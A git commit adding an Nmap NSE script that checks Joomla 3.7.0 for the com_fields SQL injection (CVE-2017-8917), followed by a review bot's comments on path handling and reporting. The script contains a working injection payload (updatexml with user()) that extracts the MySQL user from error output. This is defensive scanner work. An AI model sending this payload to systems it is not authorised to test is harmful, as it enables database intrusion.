
Added http-vuln-cve2017-8917.nse. Closes #916

This commit is contained in:
waituck
2017-06-26 20:10:32 +00:00
parent 226863eef2
commit 50964389a4
3 changed files with 149 additions and 2 deletions


@@ -1,4 +1,7 @@
# Nmap Changelog ($Id: CHANGELOG 36805 2017-06-11 20:17:30Z dmiller $); -*-text-*- # Nmap Changelog ($Id$); -*-text-*-
o [NSE] http-vuln-cve2017-8917 checks for an SQL injection vulnerability
affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck]
o [NSE][GH#141] http-useragent-checker now checks for changes in HTTP status o [NSE][GH#141] http-useragent-checker now checks for changes in HTTP status
(usually 403 Forbidden) in addition to redirects to indicate forbidden User (usually 403 Forbidden) in addition to redirects to indicate forbidden User


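--- /dev/null
+++ b/http-vuln-cve2017-8917.nse
@@ -0,0 +1,143 @@
+local http = require "http"
+local shortport = require "shortport"
+local string = require "string"
+local stdnse = require "stdnse"
+local vulns = require "vulns"
+local table = require "table"
+description = [[
+An SQL Injection vulnerability affecting Joomla! 3.7.x before 3.7.1 allows for
+unauthenticated users to execute arbitrary SQL commands. This vulnerability was
+caused by a new component, <code>com_fields</code>, which was introduced in
+version 3.7. This component is publicly accessible, which means this can be
+exploited by any malicious individual visiting the site.
+The script attempts to inject an SQL statement that runs the <code>user()</code>
+information function on the target website. A successful injection will return
+the current MySQL user name and host name in the extra_info table.
+This script is based on a Python script written by brianwrf.
+References:
+* https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
+* https://github.com/brianwrf/Joomla3.7-SQLi-CVE-2017-8917
+]]
+---
+-- @usage nmap --script http-vuln-cve2017-8917 -p 80 <target>
+-- @usage nmap --script http-vuln-cve2017-8917 --script-args http-vuln-cve2017-8917.uri=joomla/ -p 80<target>
+-- @output
+-- PORT STATE SERVICE VERSION
+-- 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
+-- | http-vuln-cve2017-8917:
+-- | VULNERABLE:
+-- | Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
+-- | State: VULNERABLE
+-- | IDs: CVE:CVE-2017-8917
+-- | Risk factor: High CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
+-- | An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
+-- | to execute aribitrary SQL commands via unspecified vectors.
+-- |
+-- | Disclosure date: 2017-05-17
+-- | Extra information:
+-- | User: root@localhost
+-- | References:
+-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
+-- |_ https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
+--
+-- @xmloutput
+-- <table key="CVE-2017-8917">
+-- <elem key="title">Joomla! 3.7.0 &apos;com_fields&apos; SQL Injection Vulnerability</elem>
+-- <elem key="state">VULNERABLE</elem>
+-- <table key="ids">
+-- <elem>CVE:CVE-2017-8917</elem>
+-- </table>
+-- <table key="scores">
+-- <elem key="CVSSv3">9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</elem>
+-- </table>
+-- <table key="description">
+-- <elem>An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers&#xa;to execute aribitrary SQL commands via unspecified vectors.&#xa;</elem>
+-- </table>
+-- <table key="dates">
+-- <table key="disclosure">
+-- <elem key="day">17</elem>
+-- <elem key="month">05</elem>
+-- <elem key="year">2017</elem>
+-- </table>
+-- </table>
+-- <elem key="disclosure">2017-05-17</elem>
+-- <table key="check_results">
+-- </table>
+-- <table key="extra_info">
+-- <elem>User: root@localhost</elem>
+-- </table>
+-- <table key="refs">
+-- <elem>https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html</elem>
+-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917</elem>
+-- </table>
+-- </table>
+-- @args http-vuln-cve2017-8917.uri The webroot of the Joomla installation
+--
+---
+author = "Wong Wai Tuck"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"vuln", "intrusive"}
+local REG_EXP_SUCCESS = {"XPATH syntax error: &#039;(.-)&#039;",
+"XPATH syntax error: '(.-)'"}
+portrule = shortport.http
+action = function(host, port)
+local vuln_table = {
+title = "Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability",
+IDS = {CVE = 'CVE-2017-8917'},
+risk_factor = "High",
+scores = {
+CVSSv3 = "9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)",
+},
+description = [[
+An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
+to execute aribitrary SQL commands via unspecified vectors.
+]],
+references = {
+'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html',
+},
+dates = {
+disclosure = {year = '2017', month = '05', day = '17'},
+},
+check_results = {},
+extra_info = {}
+}
+local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+vuln_table.state = vulns.STATE.NOT_VULN
+local uri = stdnse.get_script_args(SCRIPT_NAME .. '.uri') or '/'
+uri = uri .. 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)'
+stdnse.debug1("Attacking uri %s", uri)
+local response = http.get(host, port, uri)
+stdnse.debug1("Response %s", response.status)
+if response.status then
+local result, matches
+-- If it contains a matching string, it means SQL injection was successful
+-- Otherwise it isn't vulnerable
+for _, pattern in ipairs(REG_EXP_SUCCESS) do
+stdnse.debug1(pattern)
+result, matches = http.response_contains(response, pattern)
+if result then
+stdnse.debug1("Vulnerability found!")
+vuln_table.state = vulns.STATE.VULN
+table.insert(vuln_table.extra_info, string.format("User: %s", matches[1]))
+break
+end
+end
+end
+return vuln_report:make_output(vuln_table)
+end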
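Review bot: The `uri` script-arg is appended to the request path without normalization, so a value lacking a trailing slash (`uri=joomla`) yields `joomlaindex.php?...` and the check quietly misses a vulnerable host; the second @usage example only works because it shows `joomla/`, and that same example has no leading slash, which appears to reach `http.get` as-is and is worth confirming against the http library. Normalizing before the concatenation, `if uri:sub(-1) ~= '/' then uri = uri .. '/' end`, makes the argument robust. When the request fails (`response.status` is nil) the state stays at NOT_VULN, which a report reader cannot distinguish from a genuine negative; a debug message at that point (and `vulns.STATE.UNKNOWN`, if the vulns library in this tree provides it) would make the outcome explicit. The report's `description` string and the @output sample both carry the typo `aribitrary`, which `arbitrary` fixes.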


@@ -142,7 +142,7 @@ Entry { filename = "hadoop-tasktracker-info.nse", categories = { "default", "dis
Entry { filename = "hbase-master-info.nse", categories = { "default", "discovery", "safe", } } Entry { filename = "hbase-master-info.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "hbase-region-info.nse", categories = { "default", "discovery", "safe", } } Entry { filename = "hbase-region-info.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "hddtemp-info.nse", categories = { "default", "discovery", "safe", } } Entry { filename = "hddtemp-info.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "hnap-info.nse", categories = { "default", "discovery", "safe", } } Entry { filename = "hnap-info.nse", categories = { "default", "discovery", "safe", "version", } }
Entry { filename = "hostmap-bfk.nse", categories = { "discovery", "external", } } Entry { filename = "hostmap-bfk.nse", categories = { "discovery", "external", } }
Entry { filename = "hostmap-ip2hosts.nse", categories = { "discovery", "external", } } Entry { filename = "hostmap-ip2hosts.nse", categories = { "discovery", "external", } }
Entry { filename = "hostmap-robtex.nse", categories = { "discovery", "external", "safe", } } Entry { filename = "hostmap-robtex.nse", categories = { "discovery", "external", "safe", } }
@@ -265,6 +265,7 @@ Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln",
Entry { filename = "http-vuln-cve2017-1001000.nse", categories = { "safe", "vuln", } } Entry { filename = "http-vuln-cve2017-1001000.nse", categories = { "safe", "vuln", } }
Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } } Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } }
Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } } Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } }
Entry { filename = "http-vuln-cve2017-8917.nse", categories = { "intrusive", "vuln", } }
Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } } Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } }
Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } } Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } } Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }